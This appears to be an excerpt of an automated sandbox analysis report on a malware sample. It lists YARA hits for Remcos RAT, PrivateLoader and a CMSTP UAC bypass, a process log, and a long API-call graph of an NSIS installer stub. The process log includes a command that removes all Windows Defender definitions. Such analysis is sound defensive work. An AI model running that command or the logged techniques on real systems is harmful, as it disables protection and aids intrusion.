• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: ditekSHen
Has exited:false

Target ID:68
Start time:16:41:36
Start date:08/05/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff693ab0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:69
Start time:16:41:41
Start date:08/05/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:0x7ff7ecad0000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:18.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:16.6%
Total number of Nodes:1375
Total number of Limit Nodes:24
4067d0 5 API calls 3755->3756 3757 403514 #17 OleInitialize SHGetFileInfoW 3756->3757 3835 4063db lstrcpynW 3757->3835 3760 403560 GetCommandLineW 3836 4063db lstrcpynW 3760->3836 3762 403572 3763 405cdd CharNextW 3762->3763 3764 403597 CharNextW 3763->3764 3765 4036c1 GetTempPathW 3764->3765 3776 4035b0 3764->3776 3837 40345e 3765->3837 3767 4036d9 3768 403733 DeleteFileW 3767->3768 3769 4036dd GetWindowsDirectoryW lstrcatW 3767->3769 3847 403015 GetTickCount GetModuleFileNameW 3768->3847 3770 40345e 12 API calls 3769->3770 3773 4036f9 3770->3773 3771 405cdd CharNextW 3771->3776 3773->3768 3775 4036fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3773->3775 3774 403747 3777 4037fe ExitProcess OleUninitialize 3774->3777 3781 4037ea 3774->3781 3788 405cdd CharNextW 3774->3788 3778 40345e 12 API calls 3775->3778 3776->3771 3779 4036ac 3776->3779 3780 4036aa 3776->3780 3782 403934 3777->3782 3783 403814 3777->3783 3786 40372b 3778->3786 3931 4063db lstrcpynW 3779->3931 3780->3765 3875 403aaa 3781->3875 3784 4039b8 ExitProcess 3782->3784 3785 40393c GetCurrentProcess OpenProcessToken 3782->3785 3790 405a41 MessageBoxIndirectW 3783->3790 3792 403954 LookupPrivilegeValueW AdjustTokenPrivileges 3785->3792 3793 403988 3785->3793 3786->3768 3786->3777 3803 403766 3788->3803 3791 403822 ExitProcess 3790->3791 3792->3793 3796 4067d0 5 API calls 3793->3796 3794 4037fa 3794->3777 3799 40398f 3796->3799 3797 4037c4 3801 405db8 18 API calls 3797->3801 3798 40382a 3800 4059ac 5 API calls 3798->3800 3802 4039a4 ExitWindowsEx 3799->3802 3806 4039b1 3799->3806 3804 40382f lstrcatW 3800->3804 3805 4037d0 3801->3805 3802->3784 3802->3806 3803->3797 3803->3798 3807 403840 lstrcatW 3804->3807 3808 40384b lstrcatW lstrcmpiW 3804->3808 3805->3777 3932 4063db lstrcpynW 3805->3932 3809 40140b 2 API calls 3806->3809 3807->3808 3808->3777 3810 403867 3808->3810 3809->3784 3812 403873 3810->3812 3813 40386c 3810->3813 3817 40598f 2 API calls 3812->3817 3815 405912 4 API 
calls 3813->3815 3814 4037df 3933 4063db lstrcpynW 3814->3933 3818 403871 3815->3818 3819 403878 SetCurrentDirectoryW 3817->3819 3818->3819 3820 403893 3819->3820 3821 403888 3819->3821 3935 4063db lstrcpynW 3820->3935 3934 4063db lstrcpynW 3821->3934 3824 406418 17 API calls 3825 4038d2 DeleteFileW 3824->3825 3826 4038df CopyFileW 3825->3826 3832 4038a1 3825->3832 3826->3832 3827 403928 3828 4061a1 36 API calls 3827->3828 3830 40392f 3828->3830 3829 4061a1 36 API calls 3829->3832 3830->3777 3831 406418 17 API calls 3831->3832 3832->3824 3832->3827 3832->3829 3832->3831 3834 403913 CloseHandle 3832->3834 3936 4059c4 CreateProcessW 3832->3936 3834->3832 3835->3760 3836->3762 3838 40668a 5 API calls 3837->3838 3840 40346a 3838->3840 3839 403474 3839->3767 3840->3839 3841 405cb0 3 API calls 3840->3841 3842 40347c 3841->3842 3843 40598f 2 API calls 3842->3843 3844 403482 3843->3844 3845 405f00 2 API calls 3844->3845 3846 40348d 3845->3846 3846->3767 3939 405ed1 GetFileAttributesW CreateFileW 3847->3939 3849 403055 3868 403065 3849->3868 3940 4063db lstrcpynW 3849->3940 3851 40307b 3852 405cfc 2 API calls 3851->3852 3853 403081 3852->3853 3941 4063db lstrcpynW 3853->3941 3855 40308c GetFileSize 3856 403186 3855->3856 3870 4030a3 3855->3870 3942 402fb1 3856->3942 3858 40318f 3860 4031bf GlobalAlloc 3858->3860 3858->3868 3954 403447 SetFilePointer 3858->3954 3859 403431 ReadFile 3859->3870 3953 403447 SetFilePointer 3860->3953 3862 4031f2 3864 402fb1 6 API calls 3862->3864 3864->3868 3865 4031a8 3869 403431 ReadFile 3865->3869 3866 4031da 3867 40324c 35 API calls 3866->3867 3873 4031e6 3867->3873 3868->3774 3871 4031b3 3869->3871 3870->3856 3870->3859 3870->3862 3870->3868 3872 402fb1 6 API calls 3870->3872 3871->3860 3871->3868 3872->3870 3873->3868 3873->3873 3874 403223 SetFilePointer 3873->3874 3874->3868 3876 4067d0 5 API calls 3875->3876 3877 403abe 3876->3877 3878 403ac4 GetUserDefaultUILanguage 3877->3878 3879 403ad6 3877->3879 3955 406322 wsprintfW 3878->3955 
3880 4062a9 3 API calls 3879->3880 3882 403b06 3880->3882 3884 403b25 lstrcatW 3882->3884 3885 4062a9 3 API calls 3882->3885 3883 403ad4 3956 403d80 3883->3956 3884->3883 3885->3884 3888 405db8 18 API calls 3889 403b57 3888->3889 3890 403beb 3889->3890 3892 4062a9 3 API calls 3889->3892 3891 405db8 18 API calls 3890->3891 3895 403bf1 3891->3895 3893 403b89 3892->3893 3893->3890 3901 403baa lstrlenW 3893->3901 3902 405cdd CharNextW 3893->3902 3894 403c01 LoadImageW 3897 403ca7 3894->3897 3898 403c28 RegisterClassW 3894->3898 3895->3894 3896 406418 17 API calls 3895->3896 3896->3894 3900 40140b 2 API calls 3897->3900 3899 403c5e SystemParametersInfoW CreateWindowExW 3898->3899 3930 403cb1 3898->3930 3899->3897 3905 403cad 3900->3905 3903 403bb8 lstrcmpiW 3901->3903 3904 403bde 3901->3904 3906 403ba7 3902->3906 3903->3904 3907 403bc8 GetFileAttributesW 3903->3907 3908 405cb0 3 API calls 3904->3908 3910 403d80 18 API calls 3905->3910 3905->3930 3906->3901 3909 403bd4 3907->3909 3911 403be4 3908->3911 3909->3904 3912 405cfc 2 API calls 3909->3912 3913 403cbe 3910->3913 3964 4063db lstrcpynW 3911->3964 3912->3904 3915 403cca ShowWindow 3913->3915 3916 403d4d 3913->3916 3918 406760 3 API calls 3915->3918 3917 405516 5 API calls 3916->3917 3919 403d53 3917->3919 3920 403ce2 3918->3920 3921 403d57 3919->3921 3922 403d6f 3919->3922 3923 403cf0 GetClassInfoW 3920->3923 3927 406760 3 API calls 3920->3927 3929 40140b 2 API calls 3921->3929 3921->3930 3926 40140b 2 API calls 3922->3926 3924 403d04 GetClassInfoW RegisterClassW 3923->3924 3925 403d1a DialogBoxParamW 3923->3925 3924->3925 3928 40140b 2 API calls 3925->3928 3926->3930 3927->3923 3928->3930 3929->3930 3930->3794 3931->3780 3932->3814 3933->3781 3934->3820 3935->3832 3937 405a03 3936->3937 3938 4059f7 CloseHandle 3936->3938 3937->3832 3938->3937 3939->3849 3940->3851 3941->3855 3943 402fd2 3942->3943 3944 402fba 3942->3944 3947 402fe2 GetTickCount 3943->3947 3948 402fda 3943->3948 3945 402fc3 DestroyWindow 3944->3945 
3946 402fca 3944->3946 3945->3946 3946->3858 3950 402ff0 CreateDialogParamW ShowWindow 3947->3950 3951 403013 3947->3951 3949 40680c 2 API calls 3948->3949 3952 402fe0 3949->3952 3950->3951 3951->3858 3952->3858 3953->3866 3954->3865 3955->3883 3957 403d94 3956->3957 3965 406322 wsprintfW 3957->3965 3959 403e05 3960 403e39 18 API calls 3959->3960 3962 403e0a 3960->3962 3961 403b35 3961->3888 3962->3961 3963 406418 17 API calls 3962->3963 3963->3962 3964->3890 3965->3959 4426 40190f 4427 402d3e 17 API calls 4426->4427 4428 401916 4427->4428 4429 405a41 MessageBoxIndirectW 4428->4429 4430 40191f 4429->4430 4431 401491 4432 405443 24 API calls 4431->4432 4433 401498 4432->4433 3517 401f12 3518 402d3e 17 API calls 3517->3518 3519 401f18 3518->3519 3520 402d3e 17 API calls 3519->3520 3521 401f21 3520->3521 3522 402d3e 17 API calls 3521->3522 3523 401f2a 3522->3523 3524 402d3e 17 API calls 3523->3524 3525 401f33 3524->3525 3526 401423 24 API calls 3525->3526 3527 401f3a 3526->3527 3534 405a07 ShellExecuteExW 3527->3534 3529 401f82 3531 402925 3529->3531 3535 40687b WaitForSingleObject 3529->3535 3532 401f9f CloseHandle 3532->3531 3534->3529 3536 406895 3535->3536 3537 4068a7 GetExitCodeProcess 3536->3537 3540 40680c 3536->3540 3537->3532 3541 406829 PeekMessageW 3540->3541 3542 406839 WaitForSingleObject 3541->3542 3543 40681f DispatchMessageW 3541->3543 3542->3536 3543->3541 4434 402614 4435 402d3e 17 API calls 4434->4435 4436 40261b 4435->4436 4439 405ed1 GetFileAttributesW CreateFileW 4436->4439 4438 402627 4439->4438 4440 402596 4450 402d7e 4440->4450 4443 402d1c 17 API calls 4444 4025a9 4443->4444 4445 4025d1 RegEnumValueW 4444->4445 4446 4025c5 RegEnumKeyW 4444->4446 4448 402925 4444->4448 4447 4025e6 RegCloseKey 4445->4447 4446->4447 4447->4448 4451 402d3e 17 API calls 4450->4451 4452 402d95 4451->4452 4453 406248 RegOpenKeyExW 4452->4453 4454 4025a0 4453->4454 4454->4443 4455 401d17 4456 402d1c 17 API calls 4455->4456 4457 401d1d IsWindow 4456->4457 4458 401a20 
4457->4458 3624 401b9b 3625 401bec 3624->3625 3627 401ba8 3624->3627 3626 401c16 GlobalAlloc 3625->3626 3629 401bf1 3625->3629 3630 406418 17 API calls 3626->3630 3631 401bbf 3627->3631 3634 401c31 3627->3634 3628 406418 17 API calls 3632 40238f 3628->3632 3637 402395 3629->3637 3643 4063db lstrcpynW 3629->3643 3630->3634 3644 4063db lstrcpynW 3631->3644 3646 405a41 3632->3646 3634->3628 3634->3637 3636 401c03 GlobalFree 3636->3637 3638 401bce 3645 4063db lstrcpynW 3638->3645 3641 401bdd 3650 4063db lstrcpynW 3641->3650 3643->3636 3644->3638 3645->3641 3647 405a56 3646->3647 3648 405aa2 3647->3648 3649 405a6a MessageBoxIndirectW 3647->3649 3648->3637 3649->3648 3650->3637 4466 402b9d SendMessageW 4467 402bc2 4466->4467 4468 402bb7 InvalidateRect 4466->4468 4468->4467 4469 404d9e GetDlgItem GetDlgItem 4470 404df2 7 API calls 4469->4470 4475 40501c 4469->4475 4471 404e9c DeleteObject 4470->4471 4472 404e8f SendMessageW 4470->4472 4473 404ea7 4471->4473 4472->4471 4476 404ede 4473->4476 4479 406418 17 API calls 4473->4479 4474 405104 4478 4051ad 4474->4478 4481 40500f 4474->4481 4487 40515a SendMessageW 4474->4487 4475->4474 4501 40508e 4475->4501 4523 404cec SendMessageW 4475->4523 4477 404331 18 API calls 4476->4477 4480 404ef2 4477->4480 4482 4051c2 4478->4482 4483 4051b6 SendMessageW 4478->4483 4484 404ec0 SendMessageW SendMessageW 4479->4484 4486 404331 18 API calls 4480->4486 4489 404398 8 API calls 4481->4489 4490 4051d4 ImageList_Destroy 4482->4490 4491 4051db 4482->4491 4498 4051eb 4482->4498 4483->4482 4484->4473 4502 404f03 4486->4502 4487->4481 4493 40516f SendMessageW 4487->4493 4488 4050f6 SendMessageW 4488->4474 4494 4053b0 4489->4494 4490->4491 4495 4051e4 GlobalFree 4491->4495 4491->4498 4492 405364 4492->4481 4499 405376 ShowWindow GetDlgItem ShowWindow 4492->4499 4497 405182 4493->4497 4495->4498 4496 404fde GetWindowLongW SetWindowLongW 4500 404ff7 4496->4500 4508 405193 SendMessageW 4497->4508 4498->4492 4516 405226 4498->4516 4528 404d6c 
4498->4528 4499->4481 4503 405014 4500->4503 4504 404ffc ShowWindow 4500->4504 4501->4474 4501->4488 4502->4496 4507 404f56 SendMessageW 4502->4507 4509 404fd9 4502->4509 4510 404f94 SendMessageW 4502->4510 4511 404fa8 SendMessageW 4502->4511 4522 404366 SendMessageW 4503->4522 4521 404366 SendMessageW 4504->4521 4507->4502 4508->4478 4509->4496 4509->4500 4510->4502 4511->4502 4513 405330 4514 40533a InvalidateRect 4513->4514 4517 405346 4513->4517 4514->4517 4515 405254 SendMessageW 4518 40526a 4515->4518 4516->4515 4516->4518 4517->4492 4537 404ca7 4517->4537 4518->4513 4519 4052de SendMessageW SendMessageW 4518->4519 4519->4518 4521->4481 4522->4475 4524 404d4b SendMessageW 4523->4524 4525 404d0f GetMessagePos ScreenToClient SendMessageW 4523->4525 4526 404d43 4524->4526 4525->4526 4527 404d48 4525->4527 4526->4501 4527->4524 4540 4063db lstrcpynW 4528->4540 4530 404d7f 4541 406322 wsprintfW 4530->4541 4532 404d89 4533 40140b 2 API calls 4532->4533 4534 404d92 4533->4534 4542 4063db lstrcpynW 4534->4542 4536 404d99 4536->4516 4543 404bde 4537->4543 4539 404cbc 4539->4492 4540->4530 4541->4532 4542->4536 4544 404bf7 4543->4544 4545 406418 17 API calls 4544->4545 4546 404c5b 4545->4546 4547 406418 17 API calls 4546->4547 4548 404c66 4547->4548 4549 406418 17 API calls 4548->4549 4550 404c7c lstrlenW wsprintfW SetDlgItemTextW 4549->4550 4550->4539 4551 40149e 4552 402395 4551->4552 4553 4014ac PostQuitMessage 4551->4553 4553->4552 4554 4044a1 lstrlenW 4555 4044c0 4554->4555 4556 4044c2 WideCharToMultiByte 4554->4556 4555->4556 4557 404822 4558 40484e 4557->4558 4559 40485f 4557->4559 4618 405a25 GetDlgItemTextW 4558->4618 4561 40486b GetDlgItem 4559->4561 4562 4048ca 4559->4562 4564 40487f 4561->4564 4570 406418 17 API calls 4562->4570 4580 4049ae 4562->4580 4616 404b5d 4562->4616 4563 404859 4565 40668a 5 API calls 4563->4565 4566 404893 SetWindowTextW 4564->4566 4568 405d5b 4 API calls 4564->4568 4565->4559 4569 404331 18 API calls 4566->4569 4577 404889 
4568->4577 4574 4048af 4569->4574 4575 40493e SHBrowseForFolderW 4570->4575 4571 4049de 4576 405db8 18 API calls 4571->4576 4572 404398 8 API calls 4573 404b71 4572->4573 4578 404331 18 API calls 4574->4578 4579 404956 CoTaskMemFree 4575->4579 4575->4580 4581 4049e4 4576->4581 4577->4566 4582 405cb0 3 API calls 4577->4582 4583 4048bd 4578->4583 4584 405cb0 3 API calls 4579->4584 4580->4616 4620 405a25 GetDlgItemTextW 4580->4620 4621 4063db lstrcpynW 4581->4621 4582->4566 4619 404366 SendMessageW 4583->4619 4586 404963 4584->4586 4589 40499a SetDlgItemTextW 4586->4589 4593 406418 17 API calls 4586->4593 4588 4048c3 4591 4067d0 5 API calls 4588->4591 4589->4580 4590 4049fb 4592 4067d0 5 API calls 4590->4592 4591->4562 4599 404a02 4592->4599 4594 404982 lstrcmpiW 4593->4594 4594->4589 4597 404993 lstrcatW 4594->4597 4595 404a43 4622 4063db lstrcpynW 4595->4622 4597->4589 4598 404a4a 4600 405d5b 4 API calls 4598->4600 4599->4595 4603 405cfc 2 API calls 4599->4603 4605 404a9b 4599->4605 4601 404a50 GetDiskFreeSpaceW 4600->4601 4604 404a74 MulDiv 4601->4604 4601->4605 4603->4599 4604->4605 4606 404b0c 4605->4606 4608 404ca7 20 API calls 4605->4608 4607 404b2f 4606->4607 4609 40140b 2 API calls 4606->4609 4623 404353 KiUserCallbackDispatcher 4607->4623 4610 404af9 4608->4610 4609->4607 4612 404b0e SetDlgItemTextW 4610->4612 4613 404afe 4610->4613 4612->4606 4615 404bde 20 API calls 4613->4615 4614 404b4b 4614->4616 4617 40477b SendMessageW 4614->4617 4615->4606 4616->4572 4617->4616 4618->4563 4619->4588 4620->4571 4621->4590 4622->4598 4623->4614 4624 402522 4625 402d7e 17 API calls 4624->4625 4626 40252c 4625->4626 4627 402d3e 17 API calls 4626->4627 4628 402535 4627->4628 4629 402540 RegQueryValueExW 4628->4629 4632 402925 4628->4632 4630 402560 4629->4630 4631 402566 RegCloseKey 4629->4631 4630->4631 4635 406322 wsprintfW 4630->4635 4631->4632 4635->4631 4636 4021a2 4637 402d3e 17 API calls 4636->4637 4638 4021a9 4637->4638 4639 402d3e 17 API calls 4638->4639 4640 
4021b3 4639->4640 4641 402d3e 17 API calls 4640->4641 4642 4021bd 4641->4642 4643 402d3e 17 API calls 4642->4643 4644 4021c7 4643->4644 4645 402d3e 17 API calls 4644->4645 4647 4021d1 4645->4647 4646 402210 CoCreateInstance 4651 40222f 4646->4651 4647->4646 4648 402d3e 17 API calls 4647->4648 4648->4646 4649 401423 24 API calls 4650 4022ee 4649->4650 4651->4649 4651->4650 4652 4015a3 4653 402d3e 17 API calls 4652->4653 4654 4015aa SetFileAttributesW 4653->4654 4655 4015bc 4654->4655 4656 401fa4 4657 402d3e 17 API calls 4656->4657 4658 401faa 4657->4658 4659 405443 24 API calls 4658->4659 4660 401fb4 4659->4660 4661 4059c4 2 API calls 4660->4661 4662 401fba 4661->4662 4663 401fdd CloseHandle 4662->4663 4665 40687b 5 API calls 4662->4665 4666 402925 4662->4666 4663->4666 4667 401fcf 4665->4667 4667->4663 4669 406322 wsprintfW 4667->4669 4669->4663 4670 40202a 4671 402d3e 17 API calls 4670->4671 4672 402031 4671->4672 4673 4067d0 5 API calls 4672->4673 4674 402040 4673->4674 4675 40205c GlobalAlloc 4674->4675 4677 4020c4 4674->4677 4676 402070 4675->4676 4675->4677 4678 4067d0 5 API calls 4676->4678 4679 402077 4678->4679 4680 4067d0 5 API calls 4679->4680 4681 402081 4680->4681 4681->4677 4685 406322 wsprintfW 4681->4685 4683 4020b6 4686 406322 wsprintfW 4683->4686 4685->4683 4686->4677 4687 4023aa 4688 4023b2 4687->4688 4689 4023b8 4687->4689 4690 402d3e 17 API calls 4688->4690 4691 4023c6 4689->4691 4692 402d3e 17 API calls 4689->4692 4690->4689 4693 402d3e 17 API calls 4691->4693 4696 4023d4 4691->4696 4692->4691 4693->4696 4694 402d3e 17 API calls 4695 4023dd WritePrivateProfileStringW 4694->4695 4696->4694 4697 402f2b 4698 402f3d SetTimer 4697->4698 4701 402f56 4697->4701 4698->4701 4699 402fab 4700 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4700->4699 4701->4699 4701->4700 4702 40242c 4703 402434 4702->4703 4704 40245f 4702->4704 4705 402d7e 17 API calls 4703->4705 4706 402d3e 17 API calls 4704->4706 4707 40243b 4705->4707 4708 402466 4706->4708 
4710 402d3e 17 API calls 4707->4710 4712 402473 4707->4712 4713 402dfc 4708->4713 4711 40244c RegDeleteValueW RegCloseKey 4710->4711 4711->4712 4714 402e09 4713->4714 4715 402e10 4713->4715 4714->4712 4715->4714 4717 402e41 4715->4717 4718 406248 RegOpenKeyExW 4717->4718 4719 402e6f 4718->4719 4720 402e7f RegEnumValueW 4719->4720 4727 402f19 4719->4727 4729 402ea2 4719->4729 4721 402f09 RegCloseKey 4720->4721 4720->4729 4721->4727 4722 402ede RegEnumKeyW 4723 402ee7 RegCloseKey 4722->4723 4722->4729 4724 4067d0 5 API calls 4723->4724 4725 402ef7 4724->4725 4725->4727 4728 402efb RegDeleteKeyW 4725->4728 4726 402e41 6 API calls 4726->4729 4727->4714 4728->4727 4729->4721 4729->4722 4729->4723 4729->4726 4730 406f2f 4732 40697e 4730->4732 4731 4072e9 4732->4731 4732->4732 4733 406a08 GlobalAlloc 4732->4733 4734 4069ff GlobalFree 4732->4734 4735 406a76 GlobalFree 4732->4735 4736 406a7f GlobalAlloc 4732->4736 4733->4731 4733->4732 4734->4733 4735->4736 4736->4731 4736->4732 4737 401a30 4738 402d3e 17 API calls 4737->4738 4739 401a39 ExpandEnvironmentStringsW 4738->4739 4740 401a60 4739->4740 4741 401a4d 4739->4741 4741->4740 4742 401a52 lstrcmpW 4741->4742 4742->4740 4755 401735 4756 402d3e 17 API calls 4755->4756 4757 40173c SearchPathW 4756->4757 4758 401757 4757->4758 4759 402636 4760 402665 4759->4760 4761 40264a 4759->4761 4763 402695 4760->4763 4764 40266a 4760->4764 4762 402d1c 17 API calls 4761->4762 4773 402651 4762->4773 4766 402d3e 17 API calls 4763->4766 4765 402d3e 17 API calls 4764->4765 4767 402671 4765->4767 4768 40269c lstrlenW 4766->4768 4776 4063fd WideCharToMultiByte 4767->4776 4768->4773 4770 402685 lstrlenA 4770->4773 4771 4026df 4772 4026c9 4772->4771 4774 405f83 WriteFile 4772->4774 4773->4771 4773->4772 4775 405fb2 5 API calls 4773->4775 4774->4771 4775->4772 4776->4770 4777 4053b7 4778 4053c7 4777->4778 4779 4053db 4777->4779 4781 405424 4778->4781 4782 4053cd 4778->4782 4780 4053e3 IsWindowVisible 4779->4780 4788 4053fa 4779->4788 4780->4781 
4783 4053f0 4780->4783 4784 405429 CallWindowProcW 4781->4784 4785 40437d SendMessageW 4782->4785 4787 404cec 5 API calls 4783->4787 4786 4053d7 4784->4786 4785->4786 4787->4788 4788->4784 4789 404d6c 4 API calls 4788->4789 4789->4781 4797 401d38 4798 402d1c 17 API calls 4797->4798 4799 401d3f 4798->4799 4800 402d1c 17 API calls 4799->4800 4801 401d4b GetDlgItem 4800->4801 4802 402630 4801->4802 4803 4014b8 4804 4014be 4803->4804 4805 401389 2 API calls 4804->4805 4806 4014c6 4805->4806 4807 4028bb 4808 4028c1 4807->4808 4809 402bc2 4808->4809 4810 4028c9 FindClose 4808->4810 4810->4809

Control-flow Graph

APIs
• SetErrorMode.KERNELBASE ref: 004034B2
• GetVersion.KERNEL32 ref: 004034B8
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
• #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
• OleInitialize.OLE32(00000000), ref: 0040352F
• SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
• GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
• CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 00403598
  • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
  • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036D2
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EF
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403703
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040370B
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371C
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403724
• DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403738
  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
• ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 004037FE
• OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
• ExitProcess.KERNEL32 ref: 00403824
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403837
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403846
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403851
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403879
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00438800,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403982
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004039CA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
• String ID: .tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 424501083-2960561200
• Opcode ID: 4142f676c30d984fe1eee6ce44353d56b481e52f69567ab9cce989c988914f15
• Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
• Opcode Fuzzy Hash: 4142f676c30d984fe1eee6ce44353d56b481e52f69567ab9cce989c988914f15
• Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E

Control-flow Graph

[Control-flow graph of the function at 00405582 (basic blocks 00405582 to 0040590D); the rendered graph and its executed/not-executed legend are not reproduced here.]
APIs
• GetDlgItem.USER32(?,00000403), ref: 004055E0
• GetDlgItem.USER32(?,000003EE), ref: 004055EF
• GetClientRect.USER32(?,?), ref: 0040562C
• GetSystemMetrics.USER32(00000002), ref: 00405633
